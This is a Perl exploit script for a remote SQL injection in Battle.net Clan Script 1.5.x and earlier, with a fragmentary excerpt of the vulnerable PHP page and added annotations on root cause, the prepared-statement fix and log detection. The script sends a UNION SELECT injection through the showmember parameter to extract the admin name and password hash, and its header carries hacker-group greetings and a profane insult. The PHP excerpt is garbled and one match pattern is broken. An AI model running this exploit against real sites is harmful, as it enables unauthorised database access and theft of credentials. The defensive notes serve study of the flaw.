#!/usr/bin/perl -w
# download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487
##############################################################
# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #
##############################################################
########################################
#[*] Found by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & All muslims HaCkeRs :)
#[*] Fuck : JosS :@
########################################
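# Vulnerable page: PHP excerpt from the target script. Its HTML markup was
# lost when this page was extracted, so the lines below are fragmentary.
# The injectable statement is the mysql_query() call near the end of the
# excerpt, which concatenates $_GET['showmember'] into the SQL text unescaped.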
########################################
#
#
# #div>
#
#
#
Members
#
#
# Rank |
# Member Name |
# Email |
# Date Joined |
#
# ' . "\n"; }
## else { echo '' . "\n"; }
# echo '' . $rank . ' | ' . "\n";
# echo '' . $name . ' | ' . "\n";
## if($email === '') { echo 'n/a | ' . "\n"; }
# else { echo 'Email | ' . "\n"; }
# echo '' . date("F d, Y", strtotime($date)) . ' | ' . "\n";
# echo '
' . "\n";
# $alt = $alt + 1;
#}
#?>
#
#
#
Member Details
#
#
# Rank |
# Member Name |
# Email |
# Date Joined |
#
#
# ' . $r["rank"] . '' . "\n";
# echo '' . $r["name"] . ' | ' . "\n";
# if($r["email"] === '') { echo 'n/a | ' . "\n"; }
# else { echo 'Email | ' . "\n"; }
# echo '' . date("F d, Y", strtotime($r["date"])) . ' | ' . "\n";
# ?>
#
#
#
#
Medals
#
#
# Medal |
# Medal Name |
# Description |
#
#
# ' . "\n"; }
# else { echo '
' . "\n"; }
# echo ' | ' . "\n";
# echo "" . $name . " | \n";
# echo "" . $desc . " | \n";
# echo "
\n";
# $alt = $alt + 1;
#}?>
#
#
# \n";
# echo "
Recruited
\n";
# $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results "
# . "WHERE results.id = bcs_members.recruit") or die(mysql_error());
# while($r=mysql_fetch_array($result))
# {
# echo $r["name"] . "
\n";
# }
# }
# ?>
#
#*/
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# Proof-of-concept flow, annotated for defenders reading this advisory:
#   1. print a banner;
#   2. send ONE GET request whose `showmember` parameter carries a
#      UNION SELECT against bcs_members;
#   3. scan the returned HTML for a table cell and a 32-hex-digit string.
# Root cause (server side): the PHP excerpt above builds its query by
# concatenating $_GET['showmember'] into mysql_query(). The fix is to bind
# that value as a parameter (mysqli/PDO prepared statement); with the legacy
# mysql_* API, mysql_real_escape_string() is the minimum.
# Script hygiene: `-w` is enabled on the shebang line, but there is no
# `use strict`, so every variable below is an undeclared package global.

# Cosmetic only: `color` is a cmd.exe built-in that changes console colours.
# The return value is ignored, so on other platforms the call just fails.
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #\n\n";
print "\t\t# by Stack-Terrorist [v40] #\n\n";
print "\t\t############################################################\n\n";
# `use` runs at compile time, so its position after the prints is harmless.
# HTTP::Request is used further down without its own `use`; presumably it is
# loaded as a dependency of LWP::UserAgent.
use LWP::UserAgent;
# The only input is the base URL in $ARGV[0]; it is used unvalidated.
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
# Column and table names placed into the injected SELECT. The original
# comments called these "joomla" fields, which looks like a leftover from
# another script: the table is this application's own bcs_members (the same
# table the vulnerable PHP query reads).
# Column requested as the member/login name.
$user="name";
# Column requested as the stored password value.
$pass="password";
# Table the injected SELECT reads from.
$tab="bcs_members";
# NOTE(review): LWP::UserAgent->new returns an object, so the `or die`
# branch is presumably never taken.
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed IE7 User-Agent string: the UA field will not single this request out
# in access logs, but the query string will (see below).
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Request URL = base URL + page=members + a `showmember` value that closes
# the string literal with a quote, appends a four-column UNION SELECT
# (password column, MySQL user(), the constant 44, name column) restricted
# to id=1, and ends with `/*` to comment out the rest of the statement.
# Detection: web-server logs will show `page=members&showmember=` followed by
# a URL-encoded quote and `union select`; a WAF/IDS rule on that parameter
# covers this request shape.
$host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*";
# No status check: the body is read whether or not the request succeeded.
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
# NOTE(review): this pattern appears to have lost its leading HTML tag when
# the page was extracted. As written it captures whatever sits between a
# newline and the next `</td>` on the same line, i.e. the first table cell
# that starts a line in the response, not necessarily the admin name.
if ($answer =~ /
(.*?)<\/td>/){
print "\nBrought to you by v4-team.com...\n";
print "\n[+] Admin User : $1";
}
# Matches the first run of 32 hex digits anywhere in the response. That is
# the length of an MD5 digest; if bcs_members stores unsalted MD5 password
# hashes, treat them as exposed on any unpatched install and migrate to a
# salted, slow password hash.
# The `else` pairs with THIS `if` only, so the failure message depends solely
# on whether a 32-hex string was found, not on the user match above.
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# exploit exploited by Stack-Terrorist